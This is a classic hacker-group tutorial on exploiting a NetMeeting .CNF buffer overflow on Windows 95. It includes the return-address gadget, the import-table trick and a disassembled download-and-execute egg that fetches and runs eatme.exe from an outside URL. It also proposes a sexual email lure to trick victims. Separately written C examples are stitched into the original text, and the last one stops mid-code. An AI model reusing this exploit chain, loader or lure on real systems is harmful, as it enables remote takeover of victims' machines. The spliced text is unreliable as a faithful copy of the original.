;============================================================================;

                     The Tao of Windows Buffer Overflow

                            as taught by DilDog
                         cDc Ninja Strike Force
                        9-dan of the Architecture
                     Sensei of the Undocumented Opcode

;============================================================================;

@ Essence

    Throughout these ages
    our operating systems
    infested by bugs

    The ignorant world
    turns to Windows for safety
    Safety from themselves

    It is now the time
    for the world to realize
    that we all feel pain

;============================================================================;

@ Introduction

This document covers the exploitation of buffer overflows on the Windows 95,
98 and NT operating systems. Before going on, you should be familiar with the
following:

    Intel x86 Assembly, preferably Pentium
    General Windows System Architecture (you should know what the PE means in
    the PE-Executable)
    Know what a URL is.
    Have a working knowledge of C

And you will need these tools:

    A good hex editor/assembler/disassembler, such as HIEW
    A realtime debugger, such as SoftICE
    A few tools that come with Visual C++, DUMPBIN specifically.

Let's start with the basics.

;============================================================================;

@ Fundamentals

A buffer overflow happens when something is put into a buffer that does not
fit there. If data larger than the buffer is copied into it without its size
being checked, the memory lying beyond the buffer gets overwritten. Take this
function:

    void func(void)
    {
        int i;
        char buffer[256];                    // *
        for(i=0;i<512;i++) buffer[i]='A';    // !
        return;
    }

The buffer holds 256 characters, but the loop writes 512 'A's into it. The
first 256 land in the buffer; because there is no bounds checking, the other
256 overwrite whatever lives in memory directly after the buffer.

On Windows 9x/NT the stack of a 32-bit program looks roughly like this at the
line marked * (the stack grows downward, so the return address sits above the
local variables):

    STACK
    ----------------
    Local Variables
    ESP-> i
          Buffer
    ----------------
    EBP-> Old Value of EBP
    ----------------
    Return Address
    ----------------

When func returns, the processor restores EBP and ESP and pops the return
address off the stack. The line marked ! has overwritten both the saved EBP
and the return address with 'A's, so execution "returns" to 0x41414141. By
overwriting the return address we control the flow of the program: all we have
to do is make it point at memory we control, and whatever code we put there
runs when the function returns.
If we fill the buffer with our own code and make the return address point at
it, EIP lands on our code: on Windows 9x/NT the stack is executable memory.
That is the whole idea. If you only wanted the theory you could stop here; the
rest of this document shows how it works in practice.

;============================================================================;

@ What It Looks Like

    ;--------------------------------------------------------------;
    ; Rundll32
    ;
    ;   This program has performed an illegal operation
    ;   and will be shut down
    ;   If the problem persists, contact the program
    ;   vendor
    ;
    ; RUNDLL32 caused an invalid page fault in
    ; module at 00de:80808080.
    ; Registers:
    ; EAX=8160bb68 CS=014f EIP=80808080 EFLGS=00010246
    ; EBX=0063ff68 SS=0157 ESP=005400d8 EBP=005400f8
    ; ECX=00540180 DS=0157 ESI=005401c4 FS=1337
    ; EDX=bff76648 ES=0157 EDI=005401a8 GS=0000
    ; Bytes at CS:EIP:
    ;--------------------------------------------------------------;

If you have ever seen a dialog like this, you have seen a buffer overflow.
This one is a classic. To be exact, it is what you get by filling the address
field of a Microsoft NetMeeting SpeedDial shortcut with 0x80 bytes. Look at
the registers: EIP is 0x80808080, which means the return address was
overwritten with our fill bytes. What we have to do now is make that RET land
on code we supply, and put that code somewhere. This is where it gets tricky.
Along the way we will learn a bit about how NetMeeting works, and, more
importantly, about overflows in general. Overflows on 95/98/NT differ in many
ways from overflows on Unix; this document deals only with the
Windows-specific issues.

;============================================================================;

@ How Can This Be Used?

Let's look at what we have to work with. The overflow is in a file I will call
"overflow.cnf". CNF files are Microsoft NetMeeting 'SpeedDial' shortcuts. You
can put a CNF file on a web page or send it by e-mail, and double-clicking it
makes NetMeeting place a call. To exploit the flaw you send the victim a cnf
file with an enticing message, say "My girlfriend and I want you to watch us
fuck while you spank it! Call us soon, we're horny!" or whatever. The victim
double-clicks the cnf file, NetMeeting starts, and while it is handling the
address it would use to reach the ILS server, the overflow occurs and the
exploit runs. Well, almost.

The overflow happens inside 'RUNDLL32.EXE', and RUNDLL32.EXE is a different
binary on 95 and on NT. That means its import table differs between the two,
which you can confirm with DUMPBIN. It also turns out that this particular
overflow only happens on 95; on NT the exploit is ineffective. Anyway, we are
working with NetMeeting 2.1 on Windows 95; it has not been tried on 98.

;============================================================================;

@ The Good And The Bad

When the crash happens, the 'close' button does not take you back to
NetMeeting. That tells us RUNDLL32 runs as a separate process. This is both
good and bad. Good, because our code does not run inside NetMeeting itself and
NetMeeting never notices us. Bad, because RUNDLL32 loads very few DLLs or
other external resources, so anything we need we will have to load ourselves.

RUNDLL32.exe is loaded at base address 0x00400000. That means every address
inside it contains a NULL byte. Unfortunately the overflow is caused by a C
string operation, which always stops at a NULL: if our exploit code contains a
NULL byte, everything after it is cut off. Other bad characters, depending on
the case, include carriage return, line feed, lowercase or uppercase letters,
or ASCII codes of 0x80 and above (those last are fine here, as the 0x80 fill
above shows).
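The bad-byte rule from this section, as an added C example that is not part of
DilDog's text or his exploit: it filters candidate return addresses for bytes
that would not survive the string copy, and scans a module image for the
plain ways of landing on ESP (jmp esp, call esp, push esp; ret), keeping only
candidates whose address is clean. The image here is a constructed stand-in
for a DLL mapped at 0x6A600000 (the base the page gives for MSCONF.DLL); the
gadget offsets inside it are made up. The page's own gadget at 0x6A602A76 is a
longer sequence (push esp ... retn 4) that this two-byte scan would not find;
that kind of search is what you fall back to when no plain jmp esp exists.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Bad bytes for this target: 0x00 ends the C string copy. Bytes >= 0x80 are
 * fine here (the 0x80 fill produced EIP=80808080). Other targets add CR, LF
 * or letters to the set; extend this predicate for them. */
static int is_bad_byte(uint8_t b) { return b == 0x00; }

/* An address is usable as the overwritten return address only if none of
 * its four little-endian bytes is bad. */
static int address_is_clean(uint32_t addr) {
    for (int k = 0; k < 4; k++)
        if (is_bad_byte((uint8_t)(addr >> (8 * k)))) return 0;
    return 1;
}

/* Scan a module image for "jmp esp" (FF E4), "call esp" (FF D4) and
 * "push esp; ret" (54 C3). Returns how many candidates had a clean address
 * (base + offset), storing those addresses in out. */
static size_t find_esp_gadgets(const uint8_t *img, size_t len, uint32_t base,
                               uint32_t *out, size_t cap) {
    static const uint8_t pats[][2] = { {0xFF, 0xE4}, {0xFF, 0xD4}, {0x54, 0xC3} };
    size_t found = 0;
    for (size_t off = 0; off + 1 < len && found < cap; off++)
        for (size_t p = 0; p < 3; p++)
            if (img[off] == pats[p][0] && img[off + 1] == pats[p][1]) {
                uint32_t addr = base + (uint32_t)off;
                if (address_is_clean(addr)) out[found++] = addr;
                break;
            }
    return found;
}

/* Constructed 12 KiB stand-in for a module image mapped at 0x6A600000. It
 * holds a jmp esp at offset 0x0100 (address 6A600100, rejected for its 0x00
 * byte), a call esp at 0x2A12 and a push esp;ret at 0x2B77; the rest is NOPs. */
static size_t demo_scan(uint32_t *out, size_t cap) {
    static uint8_t img[0x3000];
    memset(img, 0x90, sizeof img);
    img[0x0100] = 0xFF; img[0x0101] = 0xE4;
    img[0x2A12] = 0xFF; img[0x2A13] = 0xD4;
    img[0x2B77] = 0x54; img[0x2B78] = 0xC3;
    return find_esp_gadgets(img, sizeof img, 0x6A600000u, out, cap);
}
static uint32_t demo_first(void)  { uint32_t c[8]; return demo_scan(c, 8) > 0 ? c[0] : 0; }
static uint32_t demo_second(void) { uint32_t c[8]; return demo_scan(c, 8) > 1 ? c[1] : 0; }
```

Against the real DLL you would run find_esp_gadgets over the mapped image (or
the file's code section plus its image base) and then confirm each hit in the
debugger, since a byte pair found inside an unrelated instruction is still a
valid landing point only if execution can start there.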
Something else we should know is that MSCONF.DLL is loaded. RUNDLL32 loads
MSCONF.DLL because the registry command for the .CNF file type is
"rundll32.exe msconf.dll,OpenConfLink %l". We also know KERNEL32.DLL is
loaded, since KERNEL32 functions appear in RUNDLL32's import table (and in
MSCONF.DLL's). Now compare what we know with what we want. We are targeting
NetMeeting 2.1, which is a fixed target, and so is its MSCONF.DLL. RUNDLL32
and KERNEL32, on the other hand, differ with the OS version and upgrade
level. So if we have to use fixed memory addresses at all, they must come
from MSCONF.DLL. That is essential if we want the exploit to work on more
than one OS, so rather than looking at other programs' addresses we look at
MSCONF.DLL's.

We want our exploit to download something from the Internet and run it, so we
will need WSOCK32.DLL or WININET.DLL. WinInet keeps the code simpler, so that
is what we will use. WININET is not loaded in RUNDLL32's process, so we will
have to load it ourselves. But first, let's get EIP pointed at our code.

;============================================================================;

@ Snatching the EIP

The first thing to find out is how far into the buffer the return address
lies. Try an address field like:

    Address=.....256periods....1234xyz

The buffer is 256 bytes (we know that from the crash; you would normally find
it by lengthening the string after 'address=' a little at a time and watching
what changes). So 256 periods fill the buffer, "1234" lands in the saved EBP,
which becomes 0x34333231, and "xyz" plus the string's terminating NULL land in
the return address, so EIP becomes 0x00ZZYYXX. That lets us point the return
address at whatever we control. In this case that is the buffer, but the
buffer is too small for our purposes, and we also control what follows the
return address. So we put the code after the return address:

    Address=.....256periods....1234wxyzOURCODEFOLLOWSHERE>>>

What we need is a 0xZZYYXXWW that lands execution on the code following the
return address. The return address can no longer contain a NULL: there is now
code after it that has to survive the string copy. Guess wrong and you get an
instant page fault (try 0x34333231; there is no code there). Now look closely
at the exception. At the time of the fault, ESP points into our exploit data,
16 bytes past where the saved EBP was. Do we know where the stack is in
absolute terms? No, and we do not want to depend on it. But ESP points at our
code, and that is enough: make 0xZZYYXXWW the address of a "jmp esp" or
"call esp" somewhere in memory, chosen so that the address itself contains no
0x00 or other bad byte. We look in MSCONF.DLL, base 0x6A600000, and find this
at offset 2A76:

    .00002A76: 54                     push esp
    .00002A77: 2404                   and al,004
    .00002A79: 33C0                   xor eax,eax
    .00002A7B: 8A0A                   mov cl,[edx]
    .00002A7D: 84C9                   test cl,cl
    .00002A7F: 740F                   je .000002A90
    .00002A81: 80E930                 sub cl,030 ;"0"
    .00002A84: 8D0480                 lea eax,[eax][eax]*4
    .00002A87: 0FB6C9                 movzx ecx,cl
    .00002A8A: 42                     inc edx
    .00002A8B: 8D0441                 lea eax,[ecx][eax]*2
    .00002A8E: EBEB                   jmps .000002A7B
    .00002A90: C20400                 retn 00004

This is not a jmp esp, but it has the same effect. PUSH ESP puts the value of
ESP on the stack, the loop at 2A7B runs until the byte at [edx] is zero, and
the JE to 2A90 reaches the RETN, which pops that saved ESP value into EIP. One
caveat: the loop reads memory at EDX, so the gadget relies on EDX pointing at
readable memory that has a zero byte somewhere ahead (in the crash dump above
it is bff76648); if it did not, we would fault before ever reaching the RETN.
The net effect is that ESP is popped into EIP, which is exactly what we want.

Since MSCONF.DLL is always loaded at the same base address, the code sits at
0x6A602A76 every time. So 0xZZYYXXWW is 0x6A602A76, which contains no NULL or
other bad byte. We have EIP. Now for the exploit itself. Don't skip anything.
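The frame overwrite from Fundamentals and the Address= layout from this
section, as an added C example that is not part of DilDog's text or his
exploit. It models the frame from the stack diagram (i, buffer[256], saved
EBP, return address) as one byte array, runs the page's 512-'A' loop over it,
then builds the "256 periods + 1234 + return address + egg" field and copies it
in with a strcpy-style copy that stops at the first 0x00, which is how the
string operation in RUNDLL32 behaves. The sample saved EBP, the return
address 0x00401234 inside RUNDLL32's image, the four-byte egg and the exact
frame offsets are assumptions of the model (a real compiler may order and pad
the locals differently, which is why the page finds the distance
empirically); the gadget address 0x6A602A76 is the page's.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Frame model after the Fundamentals diagram: i, buffer[256], saved EBP,
 * return address, then 256 bytes standing in for whatever the caller keeps
 * above the frame. It is one array, so the "overflow" is an in-bounds write
 * into the model. Offsets are the diagram's, not any particular compiler's. */
enum {
    OFF_I = 0, OFF_BUF = 4, BUF_SIZE = 256,
    OFF_EBP = OFF_BUF + BUF_SIZE,      /* 260 */
    OFF_RET = OFF_EBP + 4,             /* 264 */
    FRAME_TOP = OFF_RET + 4,           /* 268: first byte above the frame */
    MODEL_LEN = FRAME_TOP + 256
};
typedef struct { uint8_t b[MODEL_LEN]; } frame_t;

static uint32_t rd32(const frame_t *f, size_t off) {   /* x86 is little-endian */
    return (uint32_t)f->b[off] | (uint32_t)f->b[off + 1] << 8 |
           (uint32_t)f->b[off + 2] << 16 | (uint32_t)f->b[off + 3] << 24;
}
static void wr32(frame_t *f, size_t off, uint32_t v) {
    for (int k = 0; k < 4; k++) f->b[off + k] = (uint8_t)(v >> (8 * k));
}

/* Constructed sample frame: a saved EBP in the 0x0063FFxx region the crash
 * dump shows, and a return address inside RUNDLL32's image (base 0x00400000),
 * which is why the genuine return address contains a 0x00 byte. */
static frame_t fresh_frame(void) {
    frame_t f;
    memset(f.b, 0xCC, sizeof f.b);
    wr32(&f, OFF_I, 0);
    wr32(&f, OFF_EBP, 0x0063FF68u);
    wr32(&f, OFF_RET, 0x00401234u);
    return f;
}

/* The page's func(): 512 'A's from buffer[0], no bounds check. */
static void func_unchecked(frame_t *f) {
    for (int i = 0; i < 512; i++) f->b[OFF_BUF + i] = 'A';
}
/* The same loop with the bounds check the page says is missing. */
static void func_checked(frame_t *f) {
    for (int i = 0; i < 512 && i < BUF_SIZE; i++) f->b[OFF_BUF + i] = 'A';
}

/* "Snatching the EIP": 256 periods, "1234" (becomes the saved EBP), the
 * return address in x86 byte order, then the egg. Returns the field length. */
static size_t build_address_field(uint8_t *out, size_t cap, uint32_t ret,
                                  const uint8_t *egg, size_t egglen) {
    size_t n = 0;
    if (cap < BUF_SIZE + 8 + egglen + 1) return 0;
    memset(out, '.', BUF_SIZE);   n += BUF_SIZE;
    memcpy(out + n, "1234", 4);   n += 4;
    for (int k = 0; k < 4; k++) out[n++] = (uint8_t)(ret >> (8 * k));
    memcpy(out + n, egg, egglen); n += egglen;
    out[n] = 0;                   /* the field is a C string */
    return n;
}

/* Model of the C string operation that overflows: copies into buffer[] up to
 * the first 0x00 byte and writes the terminator, like strcpy. Returns the
 * number of bytes copied before the terminator. */
static size_t copy_field_into_frame(frame_t *f, const uint8_t *field) {
    size_t n = 0;
    while (field[n] != 0 && OFF_BUF + n < MODEL_LEN - 1) { f->b[OFF_BUF + n] = field[n]; n++; }
    f->b[OFF_BUF + n] = 0;
    return n;
}

static const uint8_t SAMPLE_EGG[] = { 0x90, 0x90, 0x33, 0xC0 };   /* constructed: nop nop xor eax,eax */

/* Run one crafted field through the model; returns 1 if the egg arrived
 * intact just above the return address, where the push esp/retn gadget lands. */
static int run_field(uint32_t ret, uint32_t *ret_seen, size_t *copied) {
    uint8_t field[BUF_SIZE + 8 + sizeof SAMPLE_EGG + 1];
    frame_t f = fresh_frame();
    build_address_field(field, sizeof field, ret, SAMPLE_EGG, sizeof SAMPLE_EGG);
    size_t n = copy_field_into_frame(&f, field);
    if (copied) *copied = n;
    if (ret_seen) *ret_seen = rd32(&f, OFF_RET);
    return memcmp(f.b + FRAME_TOP, SAMPLE_EGG, sizeof SAMPLE_EGG) == 0;
}
static uint32_t ret_after_unchecked(void) { frame_t f = fresh_frame(); func_unchecked(&f); return rd32(&f, OFF_RET); }
static uint32_t ret_after_checked(void)   { frame_t f = fresh_frame(); func_checked(&f);   return rd32(&f, OFF_RET); }
static uint32_t ret_after_field(uint32_t ret)  { uint32_t r = 0; run_field(ret, &r, NULL); return r; }
static size_t   bytes_copied_for(uint32_t ret) { size_t n = 0; run_field(ret, NULL, &n); return n; }
static int      egg_landed_for(uint32_t ret)   { return run_field(ret, NULL, NULL); }

int main(void) {
    printf("512 'A's, no check : ret=%08X\n", ret_after_unchecked());
    printf("512 'A's, checked  : ret=%08X\n", ret_after_checked());
    printf("ret=6A602A76 gadget: ret=%08X copied=%zu egg landed=%d\n",
           ret_after_field(0x6A602A76u), bytes_copied_for(0x6A602A76u), egg_landed_for(0x6A602A76u));
    printf("ret=00402A76 (NUL) : ret=%08X copied=%zu egg landed=%d\n",
           ret_after_field(0x00402A76u), bytes_copied_for(0x00402A76u), egg_landed_for(0x00402A76u));
    return 0;
}
```

The last case is the point of the section: a return address of the
0x00ZZYYXX form does get written (the copy's own terminator supplies the
0x00), but nothing after it is copied, so it is only usable when the code
lives inside the buffer itself.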
;============================================================================;

@ Constructing the Exploit

We can now run arbitrary code on the machine. Here is where it gets fun. But
there are limits on what our code can be. At 763 characters the address field
overflows a second buffer somewhere else, causing a different crash before
ours (MS has two bugs to fix here; we only exploit one). The first 256
characters are our periods, so the code gets about 500 bytes (763-256=507).
So:

    500 byte maximum exploit length
    We don't know what OS version we're running
    We don't know where any useful functions are located

Not much to work with. Let's think about what the exploit has to do. Take the
"exit" part. It has to work on Win95 and WinNT. Where is the ExitProcess
function we have to call? ExitProcess lives in Kernel32.DLL, at a different
place on each OS (and different again between Win95 OSR1 and OSR2, and
between NT service packs). Fixed addresses are out. We need to locate
functions dynamically. The Win32 API has a function for that,
"GetProcAddress": give it a module handle and a function name, and it returns
the function's address. So where is GetProcAddress? We don't know. We have to
find it before we can call it.

How? Import tables. The PE-Executable format has an import table that the OS
fills in, at load time, with the addresses of the functions a module uses.
Use DUMPBIN to look at it. Every DLL and EXE has one. MSCONF.DLL is in memory,
and that gives us one to work with: if GetProcAddress is in MSCONF.DLL's
import table, the OS wrote its address into a fixed slot of that table when it
loaded MSCONF.DLL. Let's check:

    Microsoft (R) COFF Binary File Dumper Version 5.10.7303
    Copyright (C) Microsoft Corp 1992-1997. All rights reserved.

    Dump of file msconf.dll

    File Type: DLL

      Section contains the following imports:

        KERNEL32.dll
                     23F Sleep
                     183 IsBadReadPtr
                     17E InterlockedIncrement
                     .
                     .
                     .
                      1E CompareStringA
                      98 FreeLibrary
                     116 GetProcAddress
                     190 LoadLibraryA
                      4C DeleteCriticalSection
                      51 DisableThreadLibraryCalls
                     .
                     .
                     .

Excellent! GetProcAddress is there, and so is LoadLibraryA. LoadLibrary
returns a handle to an already loaded DLL, loading it first if it is not
loaded yet, and the handle is simply the DLL's base address. That matters,
because KERNEL32.DLL sits at a different base on NT and on 95. So we run the
target and search memory for where the loader put these two addresses: they
are at 0x6A60107C (LoadLibraryA) and 0x6A601078 (GetProcAddress). We call
through those slots (call dword ptr [0x6A60107C]) and the right function runs
whichever OS we are on.

To keep things efficient, our exploit starts by building a jumptable of the
functions we want, and the rest of the code calls through that table. This is
the minimum amount of code needed to call the functions we need, and it keeps
register usage low. That is important, because the stack is where our code
lives: too much PUSHing and POPping overwrites our own code, which is a
different kind of problem.

Before we can build the jumptable, we have to decide which Win32 functions we
need. 500 bytes is too small for a real program, so our egg will download
another program (the real payload) from the Internet and run it. Our code is
thus only a loader for other code. To fetch a URL we need WININET.DLL's
InternetOpenA, InternetCloseHandle, InternetOpenUrlA and InternetReadFile.
To write the downloaded file to disk we need KERNEL32.DLL's _lcreat, _lwrite
and _lclose. To allocate memory for the download we need GlobalAlloc, also in
KERNEL32.DLL. To run the file after downloading it and to end the RUNDLL32
process we need WinExec and ExitProcess from KERNEL32.DLL. Normal Win32
programs do not call _lcreat and friends, but they exist on both Win95 and NT
and they take fewer parameters than CreateFile, so we use them.

;============================================================================;

@ Creating our Jumptable

Time to build the jumptable. Obstacle #1: we have to supply the function
names. GetProcAddress takes a module handle (we'll get to that) and a function
name as a NULL-terminated string. Didn't we say the exploit string cannot
contain NULL bytes? Yes, and the same problem applies to the URL we want to
download. Here is the trick. None of the characters in the function names or
the URL is ASCII 0x80 or above, so XOR every byte of that region with 0x80
(or ADD 0x80 to it) before putting it in the exploit string. Then, as the
first thing the exploit does, XOR the region back with 0x80. After encoding,
every byte of the region is 0x80 or above and in particular none is 0x00, so
the whole thing survives the string copy. It is not encryption, just a trick
to make the bytes _survive_. Here is the table we put in the exploit string:

    00000270: .. .. .. .. .. .. .. 4B-45 52 4E 45-4C 33 32 00          KERNEL32
    00000280: 5F 6C 63 72-65 61 74 00-5F 6C 77 72-69 74 65 00  _lcreat _lwrite
    00000290: 5F 6C 63 6C-6F 73 65 00-57 69 6E 45-78 65 63 00  _lclose WinExec
    000002A0: 45 78 69 74-50 72 6F 63-65 73 73 00-47 6C 6F 62  ExitProcess Glob
    000002B0: 61 6C 41 6C-6C 6F 63 00-57 49 4E 49-4E 45 54 00  alAlloc WININET
    000002C0: 49 6E 74 65-72 6E 65 74-4F 70 65 6E-41 00 49 6E  InternetOpenA In
    000002D0: 74 65 72 6E-65 74 43 6C-6F 73 65 48-61 6E 64 6C  ternetCloseHandl
    000002E0: 65 00 49 6E-74 65 72 6E-65 74 4F 70-65 6E 55 72  e InternetOpenUr
    000002F0: 6C 41 00 49-6E 74 65 72-6E 65 74 52-65 61 64 46  lA InternetReadF
    00000300: 69 6C 65 00-68 74 74 70-3A 2F 2F 77-77 77 2E 6C  ile http://www.l
    00000310: 30 70 68 74-2E 63 6F 6D-2F 7E 64 69-6C 64 6F 67  0pht.com/~dildog
    00000320: 2F 65 61 74-6D 65 2E 65-78 65 00 .. .. .. .. ..  /eatme.exe

And here it is after XORing every byte with 0x80 (the ASCII column is
meaningless now, so it is omitted):

    00000270: .. .. .. .. .. .. .. CB-C5 D2 CE C5-CC B3 B2 80
    00000280: DF EC E3 F2-E5 E1 F4 80-DF EC F7 F2-E9 F4 E5 80
    00000290: DF EC E3 EC-EF F3 E5 80-D7 E9 EE C5-F8 E5 E3 80
    000002A0: C5 F8 E9 F4-D0 F2 EF E3-E5 F3 F3 80-C7 EC EF E2
    000002B0: E1 EC C1 EC-EC EF E3 80-D7 C9 CE C9-CE C5 D4 80
    000002C0: C9 EE F4 E5-F2 EE E5 F4-CF F0 E5 EE-C1 80 C9 EE
    000002D0: F4 E5 F2 EE-E5 F4 C3 EC-EF F3 E5 C8-E1 EE E4 EC
    000002E0: E5 80 C9 EE-F4 E5 F2 EE-E5 F4 CF F0-E5 EE D5 F2
    000002F0: EC C1 80 C9-EE F4 E5 F2-EE E5 F4 D2-E5 E1 E4 C6
    00000300: E9 EC E5 80-E8 F4 F4 F0-BA AF AF F7-F7 F7 AE EC
    00000310: B0 F0 E8 F4-AE E3 EF ED-AF FE E4 E9-EC E4 EF E7
    00000320: AF E5 E1 F4-ED E5 AE E5-F8 E5 80 .. .. .. .. ..

Got it? Good. Obstacle #2: the exploit has to decode the table before it can
use it. We solved the first obstacle by creating this one, so now let's solve
this one too. Our code starts like this:

    00000146: 33C9                   xor ecx,ecx

Clear ECX. We will use it as a counter.

    00000148: B88053FF63             mov eax,063FF5380
    0000014D: 2C80                   sub al,080
    0000014F: C1C018                 rol eax,018

This points EAX at the end of our encoded region in memory (0x0063FF53). It is
built in three steps so that no immediate contains a NULL byte: 0x0063FF53 has
one, 0x63FF5380 does not, and subtracting 0x80 from AL and then rotating by 24
bits yields the value we want. Note that this hardcodes where the exploit data
sits on RUNDLL32's stack; it works because on this target the stack is at the
same place every run. On any other target, check that address in SoftICE
before relying on it.

    00000152: B1B4                   mov cl,0B4

ECX = 0x000000B4, the number of bytes we want to XOR back.

    00000154: 48                     dec eax
    00000155: 803080                 xor b,[eax],080
    00000158: E2FA                   loop 000000154   ---------- (1)

This is the decoding loop: walk backwards from the end of the region, XORing
each byte with 0x80. When it finishes, EAX points at the start of the decoded
table, the "KERNEL32" string, and we keep it there because we need it next.
Now we are ready to build the jumptable.

Obstacle #3: load the module and look up the addresses.

    0000015A: BE7C10606A             mov esi,06A60107C
    0000015F: 50                     push eax
    00000160: 50                     push eax
    00000161: FF16                   call d,[esi]
    00000163: 8BF0                   mov esi,eax

This calls LoadLibraryA through MSCONF.DLL's import slot, with EAX (pointing
at "KERNEL32") as the parameter. The second push looks redundant, but do not
NOP it out blindly: LoadLibraryA is stdcall and removes only one argument, so
the leftover copy of EAX is what the next instruction pops into EBX.
LoadLibraryA returns the module handle, which we move into ESI for the
GetProcAddress calls that follow.

    00000165: 5B                     pop ebx
    00000166: 8BFB                   mov edi,ebx
    00000168: 6681EF4BFF             sub di,0FF4B ;"_K"

EBX now points at the string table, and this sets EDI (which stays our table
pointer for the rest of the code) to the base of the jumptable, 181 bytes past
the start of the string table: subtracting 0xFF4B from DI is the same as
adding 0xB5, and again keeps a NULL byte out of the immediate.

    0000016D: FC                     cld
    0000016E: 33C9                   xor ecx,ecx
    00000170: 80E9FA                 sub cl,-006

We have six kernel functions to look up, so ECX=0x00000006.

    00000173: 43                     inc ebx
    00000174: 32C0                   xor al,al
    00000176: D7                     xlat
    00000177: 84C0                   test al,al
    00000179: 75F8                   jne 000000173   ---------- (1)
    0000017B: 43                     inc ebx

This scans forward through the text until it finds a NULL (the end of the
current string), then steps EBX past it, so EBX points at the next function
name. XLAT is used because it is elite (31337), that is, because it is one
byte: with AL=0 it loads the byte at [EBX] into AL.

    0000017C: 51                     push ecx
    0000017D: 53                     push ebx
    0000017E: 56                     push esi
    0000017F: FF157810606A           call d,[06A601078]
    00000185: AB                     stosd
    00000186: 59                     pop ecx

This calls GetProcAddress(handle, name) through the import slot, saving our
loop counter around the call, and STOSD writes the returned address to [EDI]
and advances EDI by four: one jumptable entry filled.

    00000187: E2EA                   loop 000000173   ---------- (2)

And repeat for the remaining kernel functions.
That takes care of the KERNEL32 functions. Now we repeat the process for the
WININET functions.

    00000189: 43                     inc ebx
    0000018A: 32C0                   xor al,al
    0000018C: D7                     xlat
    0000018D: 84C0                   test al,al
    0000018F: 75F8                   jne 000000189   ---------- (2)
    00000191: 43                     inc ebx

This advances EBX past the last kernel name to the "WININET" string in our
table.

    00000192: 53                     push ebx
    00000193: 53                     push ebx
    00000194: FF157C10606A           call d,[06A60107C]
    0000019A: 8BF0                   mov esi,eax
    0000019C: 90                     nop
    0000019D: 90                     nop
    0000019E: 90                     nop
    0000019F: 90                     nop

Ignore the NOPs and the double push; here the second push really is
redundant (nothing pops it afterwards, it just leaves a stale dword below
ESP), so it could be a NOP. This loads WININET.DLL, which gives us its handle
(base address), and saves it in ESI.

    000001A0: 33C9                   xor ecx,ecx
    000001A2: 83E9FC                 sub ecx,-004
    000001A5: 43                     inc ebx
    000001A6: 32C0                   xor al,al
    000001A8: D7                     xlat
    000001A9: 84C0                   test al,al
    000001AB: 75F8                   jne 0000001A5
    000001AD: 43                     inc ebx
    000001AE: 51                     push ecx
    000001AF: 53                     push ebx
    000001B0: 56                     push esi
    000001B1: FF157810606A           call d,[06A601078]
    000001B7: AB                     stosd
    000001B8: 59                     pop ecx
    000001B9: E2EA                   loop 0000001A5

This is a copy of the kernel lookup loop, this time fetching the four WININET
function addresses. It would be nicer not to have the code twice, but it
works.

Now we have the jumptable. EDI points at the dword right after the table, so
we can call any of our functions relative to EDI (call dword ptr [edi-16],
and so on). It looks like an import table and it does the same job. Now we
can write our real code, without having depended on a single fixed address
outside MSCONF.DLL.

;============================================================================;

@ The Shit

Now that we have the jumptable, the rest is easy:

    000001BB: 90                     nop
    000001BC: 90                     nop
    000001BD: 33C0                   xor eax,eax
    000001BF: 6648                   dec ax
    000001C1: D1E0                   shl eax,1
    000001C3: 33D2                   xor edx,edx
    000001C5: 50                     push eax
    000001C6: 52                     push edx
    000001C7: FF57EC                 call d,[edi][-0014]
    000001CA: 8BF0                   mov esi,eax

This allocates 131070 bytes of memory. EAX is built up to 131070 (0xFFFF
doubled) without a NULL byte in any immediate, then we call GlobalAlloc
through the jumptable slot at EDI-0x14 with dwBytes=EAX and uFlags=0. Flags
value 0 is GMEM_FIXED, so GlobalAlloc returns a usable memory pointer rather
than a handle, and we keep it in ESI.

    000001CC: 33D2                   xor edx,edx
    000001CE: 52                     push edx
    000001CF: 52                     push edx
    000001D0: 52                     push edx
    000001D1: 52                     push edx
    000001D2: 57                     push edi
    000001D3: FF57F0                 call d,[edi][-0010]

Next we call InternetOpenA, at EDI-0x10, to get an Internet handle. All of
its parameters are zero here except the first, the agent name, for which we
pass EDI (any readable string will do). The Internet handle comes back in EAX,
and we use it as the parameter of the next call...
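Before going on with the rest of the egg, here is the data area it has just
built, as an added C model that is not part of the original document or of
DilDog's code. It takes the string table and the constants from the listings
above (XOR with 0x80, 0xB4 bytes, the jumptable 0xB5 bytes past "KERNEL32",
six KERNEL32 names then four WININET names, the URL at EDI-0x50 and the
filename at EDI-0x2F) and replays the decode loop, the xlat scan and the stosd
fill in C, so you can check which slot each "call d,[edi-xx]" below resolves
to. LoadLibraryA and GetProcAddress are replaced by constructed stand-ins with
made-up module bases and export addresses; everything else comes from the
page.

```c
#include <stdint.h>
#include <string.h>

/* The page's string table in its order, NUL separated; offsets are relative
 * to the 'K' of KERNEL32 (file offset 0x277 in the page's dump). */
static const char TABLE_PLAIN[] =
    "KERNEL32\0_lcreat\0_lwrite\0_lclose\0WinExec\0ExitProcess\0GlobalAlloc\0"
    "WININET\0InternetOpenA\0InternetCloseHandle\0InternetOpenUrlA\0InternetReadFile\0"
    "http://www.l0pht.com/~dildog/eatme.exe";
enum { TABLE_LEN = sizeof TABLE_PLAIN,  /* 180: the 0xB4 the decoder loads into CL */
       JT_BASE = 0xB5,                  /* sub di,0FF4B == add 0xB5: first jumptable slot */
       EGG_LEN = 0x100 };               /* table, jumptable, bytes-read dword, slack */

/* Obstacle #1: XOR with 0x80. Names and URL are plain ASCII, so every encoded
 * byte is >= 0x80 and none is 0x00. Returns 0 if an input byte is >= 0x80. */
static int encode_table(const uint8_t *in, uint8_t *out, size_t n) {
    for (size_t k = 0; k < n; k++) { if (in[k] >= 0x80) return 0; out[k] = in[k] ^ 0x80; }
    return 1;
}
/* Obstacle #2, the egg's loop: EAX one past the region, CL = count,
 * "dec eax / xor byte [eax],80h / loop". */
static void decode_in_place(uint8_t *end, size_t count) { while (count--) { end--; *end ^= 0x80; } }

/* "inc ebx / xor al,al / xlat / test al,al / jne / inc ebx": from the string
 * at pos, return the offset of the string after the next 0x00. */
static size_t next_name(const uint8_t *tbl, size_t pos) {
    do { pos++; } while (tbl[pos] != 0);
    return pos + 1;
}

/* Constructed stand-ins for LoadLibraryA/GetProcAddress (the egg calls the
 * real ones through MSCONF.DLL's import slots 0x6A60107C/0x6A601078). Module
 * bases and export addresses are made up for the model. */
typedef struct { const char *dll; const char *name; uint32_t addr; } export_t;
static const export_t FAKE_EXPORTS[] = {
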